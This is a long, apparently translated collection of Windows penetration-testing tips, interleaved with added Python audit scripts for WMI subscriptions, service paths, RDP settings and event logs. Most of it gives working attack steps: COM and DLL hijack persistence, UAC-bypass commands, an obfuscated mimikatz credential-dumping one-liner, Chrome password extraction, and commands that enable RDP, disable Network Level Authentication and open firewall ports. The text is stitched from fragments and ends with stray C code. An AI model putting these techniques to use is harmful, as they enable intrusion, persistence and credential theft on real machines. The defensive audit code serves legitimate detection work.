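Consumer=CommandLineEventConsumer.Name="BotConsumer23"
Filter=__EventFilter.Name="BotFilter82"
"""

# The one binding Windows ships with in root\subscription; anything else
# was added afterwards and should be explainable.
BASELINE_BINDINGS = {("SCM Event Log Filter", "SCM Event Log Consumer")}
REF = re.compile(r'^(\w+)\.Name="(.*)"$')


def parse_wmic_list(text: str) -> List[Dict[str, str]]:
    """Turn /FORMAT:list output (blank-line separated Key=Value blocks) into dicts."""
    records, current = [], {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            if current:
                records.append(current)
                current = {}
            continue
        key, _, value = line.partition("=")
        current[key] = value
    if current:
        records.append(current)
    return records


def audit_subscriptions(filters_txt: str, consumers_txt: str, bindings_txt: str) -> List[Dict[str, str]]:
    """Resolve each non-baseline binding to its trigger query and its action."""
    filters = {f["Name"]: f for f in parse_wmic_list(filters_txt)}
    consumers = {c["Name"]: c for c in parse_wmic_list(consumers_txt)}
    findings = []
    for binding in parse_wmic_list(bindings_txt):
        fm, cm = REF.match(binding.get("Filter", "")), REF.match(binding.get("Consumer", ""))
        if not fm or not cm:
            continue
        fname, cname = fm.group(2), cm.group(2)
        if (fname, cname) in BASELINE_BINDINGS:
            continue
        consumer = consumers.get(cname, {})
        action = (consumer.get("ScriptText") or consumer.get("CommandLineTemplate")
                  or consumer.get("ExecutablePath") or "?")
        findings.append({
            "filter": fname,
            "trigger": filters.get(fname, {}).get("Query", "?"),
            "consumer": cname,
            "consumer_class": cm.group(1),
            "action": action,
        })
    return findings


if __name__ == "__main__":
    for f in audit_subscriptions(FILTERS_TXT, CONSUMERS_TXT, BINDINGS_TXT):
        print(f"[!] {f['filter']} -> {f['consumer']} ({f['consumer_class']}): {f['action']}")
```

On Windows 10 and Server 2016 and later, Microsoft-Windows-WMI-Activity/Operational Event ID 5861 records each new permanent consumer binding, which is the real-time counterpart of this offline audit; the wmic DELETE verb on the same three classes removes an entry once it has been judged.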
Hijack the scheduled task UserTask to load testmsg.dll at system startup.
The operation is as follows:
Create a new key under HKEY_CURRENT_USER\Software\Classes\CLSID\{58fb76b9-ac85-4e55-ac04-427593b1d060}
Then create a new key InprocServer32 under it
with its value set to c:\test\testmsg.dll
Testmsg.dll contains the following export functions:
- DllCanUnloadNow
- DllGetClassObject
- DllRegisterServer
- DllUnregisterServer
Wait for the user to log in again.
Reference:
The helper DLL needs to include the export function InitHelperDll.
Administrator privileges:
netsh add helper c:\test\netshtest.dll
After the helper dll is successfully added, c:\test\netshtest.dll will be loaded each time netsh is called.
Reference:
Common ways:
- InjectDll
- RedirectShortcut
- RedirectEXE
《渗透测试中的Application Compatibility Shims》 (Application Compatibility Shims in penetration testing)
Use Rattler to automatically enumerate processes and detect which ones are vulnerable to DLL hijacking.
path:
- c:\windows\midimap.dll
Reference:
Write a custom Verifier provider DLL.
Install via Application Verifier.
Inject into the target process to execute the payload.
Whenever the target process starts, it executes the payload, which is equivalent to a self-starting method.
Reference:
《渗透测试中的Application Verifier(DoubleAgent利用介绍)》 (Application Verifier in penetration testing: an introduction to DoubleAgent)
Self-starting is not supported, but it can be activated remotely, and the process appears as waitfor.exe
Reference:
《Use Waitfor.exe to maintain persistence》
For .NET programs, hijacking can be achieved by modifying the AppDomainManager. If you hijack the startup of a commonly used system .NET program such as powershell.exe and add a payload to it, you can implement a passively triggered backdoor.
Reference:
《Use AppDomainManager to maintain persistence》
If the office software is already installed, you can implement hijacking by configuring the Office add-in as a passive backdoor.
Commonly used methods:
- Word WLL
- Excel XLL
- Excel VBA add-ins
- PowerPoint VBA add-ins
POC: https://github.com/3gstudent/Office-Persistence
Reference:
《Use Office to maintain persistence》
《Office Persistence on x64 operating system》
A backdoor that needs no administrator privileges and can hijack all .NET programs.
POC: https://github.com/3gstudent/CLR-Injection
Reference:
《Use CLR to maintain persistence》
Use the MSDTC service to load dlls, implement self-starting, and bypass Autoruns to detect startup items.
Reference:
《Use msdtc to maintain persistence》
No need to reboot the system, no administrator privileges required.
Implemented by modifying the registry.
POC: https://github.com/3gstudent/COM-Object-hijacking
Reference:
No need to reboot the system, no administrator privileges required
Implemented by modifying the registry
Reference:
《Use COM Object hijacking to maintain persistence——Hijack explorer.exe》
By DLL hijacking, Explorer.exe is made to load fxsst.dll.
Explorer.exe loads c:\Windows\System32\fxsst.dll at startup (the fax service is enabled by default).
Saving payload.dll as c:\Windows\fxsst.dll implements the DLL hijack: Explorer.exe picks up this fxsst.dll instead.
The same idea:
Rename payload.dll to linkinfo.dll and hijack Explorer.exe to load linkinfo.dll.
By DLL hijacking, trigger the backdoor when Office software performs certain functions.
Reference:
Create a registry key with a special name that the user normally cannot read (via the Win32 API) but the system can still execute (via the Native API)
Reference:
Modify the PowerShell profile so that the backdoor is triggered after the PowerShell process starts.
Check whether a profile is already in use:
Test-Path $profile
Create the profile:
New-Item -Path $profile -Type File -Force
Modify the contents of the profile and add the backdoor:
$string = 'Start-Process "cmd.exe"'
$string | Out-File -FilePath "C:\Users\a\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1" -Append
From:
https://rastamouse.me/2018/03/a-view-of-persistence/
Reference:
Applicable: Win7, Win8.1, Win 10
https://github.com/3gstudent/UAC-Bypass/blob/master/Invoke-EventVwrBypass.ps1
Reference:
《Study Notes of WMI Persistence using wmic.exe》
For Win10
Reference:
《Study Notes of using sdclt.exe to bypass UAC》
For Win8, Win10
reg add hkcu\Environment /v windir /d "cmd /K reg delete hkcu\Environment /v windir /f && REM "
schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Reference:
《Study Notes of using SilentCleanup to bypass UAC》
Only for Win7
Reference:
《Empire中的Invoke-WScriptBypassUAC利用分析》 (Analysis of Invoke-WScriptBypassUAC in Empire)
Only for Win7
For Win7-Win10
E.g. gpedit.msc
Modify the environment variables and use the CLR to hijack the startup of gpedit.msc.
Reference:
For Win7-Win10
- {B29D466A-857D-35BA-8712-A758861BFEA1}
- {D5AB5662-131D-453D-88C8-9BBA87502ADE}
- {0A29FF9E-7F9C-4437-8B11-F424491E3931}
- {CB2F6723-AB3A-11D2-9C40-00C04FA30A3E}
Reference:
Modify the process information to spoof PSAPI, then call the COM component to perform the privileged operation.
Reference:
《通过COM组件IARPUninstallStringLauncher绕过UAC》 (Bypassing UAC via the IARPUninstallStringLauncher COM component)
Tips 32. An exe or DLL generated by Visual Studio fails on other systems with an error about missing DLL files.
Workaround: package the program for release.
Project menu -> Project Properties -> C/C++ -> Code Generation -> Runtime Library, select Multi-threaded (/MT)
LaZagne can export the passwords stored by common applications on the current system (e.g. browsers, Wi-Fi, Git, Outlook, etc.)
https://github.com/AlessandroZ/LaZagne
Of course, you can also modify the LaZagne source code to export passwords from other applications.
Reference:
Read a text file:
$file = Get-Content "1.txt"
Write a text file:
$file | Set-Content "1.txt"
Read a binary file:
[System.IO.File]::ReadAllBytes('1.exe')
Write a binary file:
[System.IO.File]::WriteAllBytes("1.exe",$fileContentBytes)
Encoding:
$encoded = [System.Convert]::ToBase64String($fileContent)
Decoding:
$fileContent = [System.Convert]::FromBase64String($encoded)
Reference:
《Study Notes of using BGInfo to bypass Application Whitelisting》
https://github.com/danielbohannon/Invoke-Obfuscation
Eg.
Set the code to be obfuscated:
set scriptblock " Invoke-111111 -Command "log privilege::debug sekurlsa::logonpasswords exit" "
Enter encoding
Enter 1
and specify the encoding as ascii
Get the obfuscated code:
" $(SEt-iTem 'VARIaBle:OFS' '' ) "+ [StRinG](( 73,110 , 118 ,111, 107, 101, 45, 49, 49 ,49 ,49 ,49 , 49, 32 , 45 , 67, 111, 109 , 109, 97 , 110 , 100 , 32,34,108, 111, 103 ,32, 112 ,114 , 105,118,105,108, 101, 103 ,101, 58 , 58 , 100 , 101 , 98, 117 ,103,32 , 115,101,107 ,117,114 , 108,115, 97 ,58 , 58, 108 ,111 ,103,111,110, 112, 97, 115 ,115,119, 111, 114, 100, 115, 32, 101, 120,105,116 ,34 )|FOReacH-objeCT{( [ChAR][iNT] $_) } ) +"$( Set-variAbLE 'oFS' ' ' ) "|. ( $env:PUbLic[13]+$eNv:PuBlIc[5]+'x')
Two common methods:
- Use py2exe
- Use PyInstaller
Usage and common bug fixes can be found in the reference link
Reference:
Eg.
Release files to the c:\windows folder with normal user rights
makecab c:\test\test.exe %TMP%\1.tmp
wusa %TMP%\1.tmp /extract:"c:\windows" /quiet
Applicable to Win7, Win8, learning from:
Reference:
《Empire中的Invoke-WScriptBypassUAC利用分析》 (Analysis of Invoke-WScriptBypassUAC in Empire)
Common methods:
- at
- psexec
- WMIC
- wmiexec
- smbexec
- powershell remoting
Psexec usage:
psexec.exe \\test.local /accepteula -u test\admin -p test123! -s -c test.bat
test.bat is a local file
New method:
- DCOM
Reference:
Enumerate the executable path corresponding to each Windows service. If a normal user has write permission on that path, the service can be used to escalate privileges.
powershell code:
```
$ErrorActionPreference = "SilentlyContinue"
# Every service with its binary path (PathName may be quoted and carry arguments)
$services = Get-WmiObject win32_service | Select-Object Name, PathName, ProcessId, StartMode, State, Status
foreach ($svc in $services) {
    # Cut the drive-rooted path out of PathName and keep only its directory
    $p = $svc.PathName.ToUpper()
    $p = $p.Substring($p.IndexOfAny("C"))
    $dir = $p.Substring(0, $p.LastIndexOfAny("\"))
    $acl = Get-Acl -Path $dir
    # Directories owned by SYSTEM, TrustedInstaller or Administrators are skipped;
    # anything else is reported for a closer look
    if ($acl.Owner -ne "NT AUTHORITY\SYSTEM" -and
        $acl.Owner -ne "NT SERVICE\TrustedInstaller" -and
        $acl.Owner -ne "BUILTIN\Administrators") {
        $svc | Format-List Name, PathName, ProcessId, StartMode, State, Status
        Write-Host "Owner: $($acl.Owner)"
    }
}
Write-Host "[+] All done."
```
Reference:
《Use powershell to find a writable windows service》
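The same check with the path parsing done carefully, as an added example that is not from the page or the referenced article. service_binary handles a quoted PathName, an unquoted one with arguments, and the unquoted-with-spaces case (which it flags as well, a related misconfiguration the page does not cover); audit_services then compares the directory owner against the three principals the PowerShell above accepts. Owner is the page's proxy for writability; a full audit would inspect the ACL for write rights granted to non-admin principals. SAMPLE_SERVICES and SAMPLE_OWNERS are constructed stand-ins for Get-WmiObject and Get-Acl output.

```python
from typing import Dict, List, Tuple

TRUSTED_OWNERS = {"NT AUTHORITY\\SYSTEM", "NT SERVICE\\TrustedInstaller", "BUILTIN\\Administrators"}

# Constructed stand-in for Get-WmiObject win32_service output
SAMPLE_SERVICES = [
    {"Name": "Schedule", "PathName": r"C:\Windows\system32\svchost.exe -k netsvcs"},
    {"Name": "GoodApp", "PathName": r'"C:\Program Files\GoodApp\agent.exe" --service'},
    {"Name": "WeakApp", "PathName": r"C:\Tools\WeakApp\agent.exe -run"},
    {"Name": "SpacyApp", "PathName": r"C:\Program Files\Spacy App\agent.exe"},
]
# Constructed stand-in for Get-Acl: lower-cased directory -> owner
SAMPLE_OWNERS = {
    r"c:\windows\system32": r"NT SERVICE\TrustedInstaller",
    r"c:\program files\goodapp": r"BUILTIN\Administrators",
    r"c:\tools\weakapp": r"DESKTOP-TEST\alice",
    r"c:\program files\spacy app": r"BUILTIN\Administrators",
}


def service_binary(pathname: str) -> Tuple[str, bool]:
    """Return (executable path, unquoted_with_spaces) from a service PathName.

    A quoted path ends at the closing quote. An unquoted one is taken up to the
    first token ending in .exe; if that spans a space, the service is also
    exposed to the well-known unquoted-path hijack.
    """
    p = pathname.strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        return (p[1:end] if end > 0 else p[1:]), False
    exe_tokens = []
    for tok in p.split(" "):
        exe_tokens.append(tok)
        if tok.lower().endswith(".exe"):
            break
    exe = " ".join(exe_tokens)
    return exe, (" " in exe)


def binary_directory(pathname: str) -> str:
    """Directory that holds the service binary."""
    exe, _ = service_binary(pathname)
    return exe.rsplit("\\", 1)[0]


def audit_services(services: List[Dict[str, str]], owner_of: Dict[str, str]) -> List[Dict[str, object]]:
    """Flag services whose binary directory is owned by an unexpected principal
    or whose unquoted path contains spaces."""
    findings = []
    for svc in services:
        exe, unquoted = service_binary(svc["PathName"])
        directory = exe.rsplit("\\", 1)[0]
        owner = owner_of.get(directory.lower(), "?")
        problems = []
        if owner not in TRUSTED_OWNERS:
            problems.append(f"directory owned by {owner}")
        if unquoted:
            problems.append("unquoted path containing spaces")
        if problems:
            findings.append({"name": svc["Name"], "dir": directory, "problems": problems})
    return findings


if __name__ == "__main__":
    for f in audit_services(SAMPLE_SERVICES, SAMPLE_OWNERS):
        print(f"[!] {f['name']} ({f['dir']}): {'; '.join(f['problems'])}")
```

Driver services whose ImagePath is a .sys file under \SystemRoot are not handled by the .exe heuristic; for those the same directory logic applies once the path has been expanded.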
Tips 41. Use anti-virus software configuration errors to achieve self-starting that runs ahead of the anti-virus software
Windows supports Logon Scripts, which are executed at system startup. They run before the anti-virus software starts, so the anti-virus software cannot intercept what the Logon Scripts do (it has not been started yet).
The key is whether the anti-virus software intercepts the configuration of Logon Scripts.
Add Logon Scripts with special operations and the anti-virus software will not intercept them.
Note:
The anti-virus software mentioned above refers to "some" anti-virus software; this is not universal.
Reference:
《Use Logon Scripts to maintain persistence》
Use Visual Studio:
The project name should match the name specified by namespace. If it does not, it can be changed under Project -> Properties -> Assembly name. Otherwise the generated dll cannot be used.
Use csc.exe:
Eg.
```
using System;
using System.Diagnostics;
namespace TestDotNet
{
    public class Class1
    {
        static Class1()
        {
            Process.Start("cmd.exe");
            Environment.Exit(0);
        }
    }
}
```
Save it as TestDotNet.cs and generate it with csc.exe:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:library TestDotNet.cs
If saved as a.cs, you need to add the /out parameter to set the output file to TestDotNet.dll, so that the assembly name also defaults to TestDotNet (matching the code); otherwise the dll can be loaded but not executed. The parameters are as follows:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:library /out:TestDotNet.dll a.cs
Using an IPC connection, if NetBIOS over TCP/IP is enabled on the target:
- If the target has both ports 139 and 445 open, the system preferentially uses port 445.
- If the target has port 445 disabled, you can connect using port 139.
If NetBIOS over TCP/IP is disabled on the target:
- If the target has port 445 disabled, you cannot connect.
Start the TrustedInstaller service and obtain TrustedInstaller permissions by duplicating its token.
Common methods:
- SelectMyParent
- Invoke-TokenManipulation.ps1
- incognito
Reference:
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
1 means closed (remote desktop disabled), 0 means open (remote desktop enabled)
View the port of the remote desktop connection:
REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
Method 1: cmd
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f
Method 2: reg file
The content is as follows:
```
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000d3d
```
Import the registry:
regedit /s a.reg
Note:
The port change takes effect after a restart
Supplement:
If the system has not been configured with Remote Desktop Services, you will need to add a firewall rule when you first open it, allowing port 3389. The command is as follows:
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
If the connection fails with: An authentication error has occurred. The function requested is not supported.
We need to disable: Allow connections only from computers running Remote Desktop with Network Level Authentication (recommended)
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0x00000000 /f
Kali:
rdesktop 192.168.1.1:3389
Windows:
mstsc.exe
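A parser for the .reg file format used in Method 2 and an audit of what it sets, as an added example that is not from the page. parse_reg turns the file into {key: {name: value}} with dword values converted to integers, and audit_rdp reports whether RDP is enabled, which port it listens on and whether Network Level Authentication (UserAuthentication, the value the supplement above turns off) is still required. SAMPLE_REG is constructed from the a.reg content above plus the UserAuthentication value; the defaults assumed when a value is absent are noted in the code.

```python
import re
from typing import Dict

# Constructed a.reg: the page's Method 2 content plus the UserAuthentication
# value that the supplement above sets to 0
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000d3d
"UserAuthentication"=dword:00000000
"""

TS = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
RDP_TCP = TS + r"\WinStations\RDP-Tcp"


def parse_reg(text: str) -> Dict[str, Dict[str, object]]:
    """Parse a .reg export into {key: {name: value}}; dword data becomes int."""
    result, key = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor") or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            result.setdefault(key, {})
            continue
        m = re.match(r'^"([^"]+)"=(.*)$', line)
        if not m or key is None:
            continue
        name, data = m.group(1), m.group(2)
        if data.lower().startswith("dword:"):
            value = int(data[6:], 16)
        elif data.startswith('"') and data.endswith('"'):
            value = data[1:-1].replace("\\\\", "\\")
        else:
            value = data  # hex(...) and other types are left as text
        result[key][name] = value
    return result


def audit_rdp(reg: Dict[str, Dict[str, object]]) -> Dict[str, object]:
    """Summarise the RDP posture encoded in the parsed registry data."""
    ts, tcp = reg.get(TS, {}), reg.get(RDP_TCP, {})
    enabled = ts.get("fDenyTSConnections", 1) == 0   # absent -> 1, RDP off (client default)
    port = tcp.get("PortNumber", 3389)                # absent -> default port
    nla = tcp.get("UserAuthentication", 1) == 1       # absent -> NLA required
    warnings = []
    if enabled and not nla:
        warnings.append("NLA disabled: unauthenticated clients reach the logon screen and the RDP stack")
    if port != 3389:
        warnings.append(f"non-default port {port}: firewall rules must match; this is not a security control")
    return {"rdp_enabled": enabled, "port": port, "nla_required": nla, "warnings": warnings}


if __name__ == "__main__":
    print(audit_rdp(parse_reg(SAMPLE_REG)))
```

The same audit can be fed from a live host by exporting the two keys with reg export and passing the file content to parse_reg, which is also a convenient way to diff a baseline against the current state.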
On non-server versions of Windows, only one account is allowed to log in by default.
Specifically:
When you log in remotely with the same account as the console session, the console session is switched to the login screen.
When you use a different account, the console desktop prompts to disconnect the current connection (accepted by default after 30 seconds).
Solution:
Use mimikatz.exe to execute ts::multirdp to allow multiple users to log in remotely.
Remote logins from different accounts then no longer conflict, and the console desktop shows no prompt.
Of course, logging in with the same account as the console session still switches it to the login screen.
Note:
This method stops working after the system restarts; re-execute ts::multirdp before the next use.
Modifying the file termsrv.dll makes the change permanent.
Reference:
The remote system needs to allow remote management of the Windows Firewall. The command to enable it is as follows:
netsh advfirewall set currentprofile settings remotemanagement enable
Eg.
netsh -r 192.168.0.2 -u TEST\administrator -p domain123! advfirewall firewall add rule name="any" protocol=TCP dir=in localport=any action=allow
Reference:
When the UAC prompt box pops up, arbitrary code is executed: the payload is inserted by modifying the registry to hijack the signature verification function.
Reference:
《Authenticode签名伪造——PE文件的签名伪造与签名验证劫持》 (Authenticode signature forgery: forging PE file signatures and hijacking signature verification)
By modifying the registry, a Microsoft certificate can be attached to a PE file.
Reference:
《Authenticode签名伪造——PE文件的签名伪造与签名验证劫持》 (Authenticode signature forgery: forging PE file signatures and hijacking signature verification)
《Authenticode签名伪造——针对文件类型的签名伪造》 (Authenticode signature forgery: signature forgery by file type)
Construct a long UNC file name to spoof the file name and obtain a Catalog signature
Reference:
Used to create symbolic links, which can be thought of as shortcuts.
To create the directory c:\test\1 pointing to c:\Temp, use one of the following:
(1) Create a symbolic link with the /D parameter:
Mklink /D "c:\test\1" "c:\Temp"
(2) Create a junction with the /J parameter:
Mklink /J "c:\test\1" "c:\Temp"
Difference:
The link created with /D additionally carries the "file shortcut" file attribute.
/J does not require administrator privileges.
/D requires administrator privileges.
Application scenario:
Change the path of a released file.
powershell -executionpolicy bypass -Command "Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -DumpCerts"
powershell -executionpolicy bypass -Command "Import-Module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz -Command ""log ""privilege::debug"" ""sekurlsa::logonpasswords"""""
Reference:
Reference:
Reference:
\\<DOMAIN>\SYSVOL\<DOMAIN>\
All hosts in the domain can access it; it stores group-policy-related data, including logon script configuration files.
Reference:
If your TeamViewer version is 13.0.5058, do not casually connect to an unknown TeamViewer server; it may be compromised.
Reference:
《TeamViewer 13.0.5058中的权限漏洞测试》 (Testing the privilege vulnerability in TeamViewer 13.0.5058)
wevtutil qe security /rd:true /f:text /q:"*[System[(EventID=4624 or EventID=4623 or EventID=4672) and TimeCreated[@SystemTime>='2022-05-26T02:30:39' and @SystemTime<='2022-05-26T02:31:00']]]" /r:dc1 /u:administrator /p:password
wevtutil qe security /rd:true /f:text /q:"Event/System[(EventID=4624 or EventID=4623 or EventID=4672) and TimeCreated[@SystemTime>='2022-05-26T02:30:39' and @SystemTime<='2022-05-26T02:31:00']]" /r:dc1 /u:administrator /p:password
(Not recommended, direct download file is too large)
Obtain the domain control file: C:\Windows\System32\winevt\Logs\Security.evtx
, filter event 4624/4623/4672.
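The same filter expressed in code, as an added example that is not part of the original page: it parses XML in the shape that `wevtutil qe security /f:xml` emits and keeps only events whose EventID is in the 4624/4623/4672 set and whose SystemTime falls inside the window used in the queries above. The sample events, account names and timestamps are constructed for this example; the element names and namespace are those of the Windows event XML schema.

```python
"""Filter exported Windows Security events by EventID and time window.

Added example, not code from the original page. It applies the same filter
as the wevtutil XPath query above (EventID 4624/4623/4672 between two
SystemTime values) to XML such as `wevtutil qe security /f:xml` emits.
The sample events below are constructed for this example.
"""
import xml.etree.ElementTree as ET
from datetime import datetime, timezone

# Namespace declared on every <Event> element that wevtutil /f:xml emits.
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed sample: wevtutil prints bare <Event> elements one after another,
# so they are wrapped in a root element here to form one XML document.
SAMPLE_EVENTS = """<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4624</EventID><TimeCreated SystemTime="2022-05-26T02:30:45.1234567Z"/></System>
  <EventData><Data Name="TargetUserName">administrator</Data><Data Name="LogonType">3</Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4672</EventID><TimeCreated SystemTime="2022-05-26T02:30:46.0000000Z"/></System>
  <EventData><Data Name="SubjectUserName">administrator</Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4625</EventID><TimeCreated SystemTime="2022-05-26T02:30:47.0000000Z"/></System>
  <EventData><Data Name="TargetUserName">guest</Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4624</EventID><TimeCreated SystemTime="2022-05-26T02:35:00.0000000Z"/></System>
  <EventData><Data Name="TargetUserName">backupsvc</Data></EventData>
</Event>
</Events>"""

# Window and ID set taken from the wevtutil queries above.
WINDOW_START = datetime(2022, 5, 26, 2, 30, 39, tzinfo=timezone.utc)
WINDOW_END = datetime(2022, 5, 26, 2, 31, 0, tzinfo=timezone.utc)
EVENT_IDS = {4624, 4623, 4672}


def parse_system_time(value):
    """Parse a SystemTime attribute (100 ns precision, trailing Z) into an aware datetime."""
    value = value.rstrip("Z")
    if "." in value:
        head, frac = value.split(".", 1)
        # datetime supports microseconds at most, so trim (or pad) the fraction to 6 digits
        value = f"{head}.{frac[:6].ljust(6, '0')}"
    return datetime.fromisoformat(value).replace(tzinfo=timezone.utc)


def filter_events(xml_text, event_ids, start, end):
    """Return (event_id, iso_time, account) for events matching the ID set and time window."""
    root = ET.fromstring(xml_text)
    matches = []
    for event in root.findall("e:Event", NS):
        system = event.find("e:System", NS)
        event_id = int(system.find("e:EventID", NS).text)
        when = parse_system_time(system.find("e:TimeCreated", NS).get("SystemTime"))
        if event_id not in event_ids or not (start <= when <= end):
            continue
        # 4624 names the logged-on account in TargetUserName; 4672 uses SubjectUserName.
        account = None
        for name in ("TargetUserName", "SubjectUserName"):
            data = event.find(f"e:EventData/e:Data[@Name='{name}']", NS)
            if data is not None:
                account = data.text
                break
        matches.append((event_id, when.isoformat(), account))
    return matches


if __name__ == "__main__":
    for row in filter_events(SAMPLE_EVENTS, EVENT_IDS, WINDOW_START, WINDOW_END):
        print(row)
```

Running it on the constructed sample keeps the 4624 logon and the 4672 special-privilege event inside the window and drops the 4625 failure and the later 4624; for real data, feed it the output of `wevtutil qe security /f:xml` wrapped in a root element.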
GetForegroundWindow() returns NULL while the screen is locked and a non-zero window handle when it is not locked.
Reference:
https://stackoverflow.com/questions/9563549/what-happens-behind-the-windows-lock-screen
Powershell POC:
https://github.com/3gstudent/Writeup/blob/master/CheckStandby.ps1
Determine the idle time through the GetIdleTime API.
c#:
https://www.codeproject.com/Articles/13384/Getting-the-user-idle-time-with-C
powershell:
https://github.com/3gstudent/Writeup/blob/master/GetIdleTime.ps1
Determine whether the screen saver is enabled:
Check the registry key HKEY_CURRENT_USER\Control Panel\Desktop for the value SCRNSAVE.EXE.
REG QUERY "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE
If the screen saver is enabled, read the value ScreenSaveTimeOut to get the idle time (in seconds) after which the screen saver starts.
REG QUERY "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeOut
Change the window state via the ShowWindowAsync API.
POC:
https://github.com/3gstudent/Writeup/blob/master/HiddenProcess.ps1
Obtained by enumerating the subkeys of HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Note:
On a 64-bit system, 32-bit programs are listed under HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
POC:
https://github.com/3gstudent/ListInstalledPrograms
wmic /NAMESPACE:"\\root\CIMV2" PATH Win32_ComputerSystem get PCSystemType /FORMAT:list
| Value | Meaning |
|---|---|
| 0 (0x0) | Unspecified |
| 1 (0x1) | Desktop |
| 2 (0x2) | Mobile |
| 3 (0x3) | Workstation |
| 4 (0x4) | Enterprise Server |
| 5 (0x5) | Small Office and Home Office (SOHO) Server |
| 6 (0x6) | Appliance PC |
| 7 (0x7) | Performance Server |
| 8 (0x8) | Maximum |
Method 1:
Read the database file %LocalAppData%\Google\Chrome\User Data\Default\Login Data. If Chrome is running, the file is locked and cannot be read directly, so copy it first.
Decrypt it directly on the current system by calling the CryptUnprotectData API.
Method 2:
mimikatz
vault::cred
Reference:
When using the Master Key, the user's plaintext password is not needed.
Reference:
"Penetration Techniques: Using the Master Key to Export Passwords Saved in the Chrome Browser Offline" (《渗透技巧——利用Masterkey离线导出Chrome浏览器中保存的密码》)
Query whether the current system has a snapshot:
vssadmin list shadows
Access the files in the history snapshot:
mklink /d c:\testvsc \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy15\
dir c:\testvsc
Reference:
aa && bb
Execute aa, then execute bb only if aa succeeded.
aa || bb
Execute aa first. If it succeeds, bb is not executed; if it fails, bb is executed.
aa & bb
Execute aa first and then bb, regardless of whether aa is successful.
Two methods; the code can be found at:
https://github.com/3gstudent/SendMail-with-Attachments
Tips 66 Get the remote desktop connection history of all users by reading the registry with powershell
By default, reading the registry only returns the information of the currently logged-on user. To get the registry configuration of a user who is not logged on, load that user's hive (configuration unit) with reg load.
The code can refer to:
https://github.com/3gstudent/ListInstalledPrograms
Reference:
"Penetration Techniques: Obtaining the Remote Desktop Connection History of a Windows System" (《渗透技巧——获得Windows系统的远程桌面连接历史记录》)
Download link:
https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
The upload command is as follows:
pscp.exe -l root -pw toor -r c:\1\putty.exe 192.168.62.131:/root/
On first connection it prompts whether to store the server's host key in the cache.
Enter y: a new key is created under the registry key HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys, and the prompt does not appear again on the next connection.
Enter n: the registry key is not saved; the connection proceeds once without caching the host key, so it is not checked against a known value.
To answer n automatically:
echo n |pscp.exe -l root -pw toor -r c:\1\putty.exe 192.168.62.131:/root/
- On Windows 8 and later, NtQueryInformationProcess with ProcessHandleInformation is the most efficient method.
- On Windows XP and later, NtQuerySystemInformation with SystemExtendedHandleInformation.
- On Windows 7 and later, NtQuerySystemInformation with SystemHandleInformation can be used.
Note:
- WinXP and Win7: ObjectTypeNumber = 0x1c
- Win8 and later: ObjectTypeNumber = 0x1e
https://github.com/3gstudent/test/raw/master/rar.exe
Maximum compression ratio:
rar.exe a -m5 1.rar 1.txt -p123456
Volume compression, one compression package per 10MB:
rar.exe a -m5 -v10m 1.rar 1.txt -p123456
Decompression:
rar.exe e 1.rar -p123456
The /v parameter shows detailed information, which is helpful for collecting information.
#include <windows.h>
#include <stdio.h>
#include <wchar.h>
WCHAR srcString[20] = L"I love you!";
WCHAR targetString[20];
/* Pass the destination size in characters (not wcslen() of an uninitialized buffer); _TRUNCATE copies as much of srcString + 1 as fits and NUL-terminates. */
wcsncpy_s(targetString, _countof(targetString), srcString + 1, _TRUNCATE);
wprintf_s(L"%s\n", targetString);